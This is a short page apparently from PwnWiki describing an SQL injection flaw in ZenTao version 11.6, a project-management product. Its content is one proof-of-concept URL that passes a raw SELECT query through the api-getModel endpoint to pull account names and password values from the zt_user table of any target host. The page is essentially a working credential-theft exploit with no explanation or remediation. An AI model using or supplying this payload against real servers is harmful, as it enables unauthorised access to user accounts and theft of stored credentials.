禅道 11.6版本 SQL注入漏洞

From PwnWiki

POC

http://xxx.xxx.xxx.xxx/api-getModel-api-sql-sql=select+account,password+from+zt_user

Retrieved from "https://pwnwiki.com/index.php?title=禅道_11.6版本_SQL注入漏洞&oldid=3731"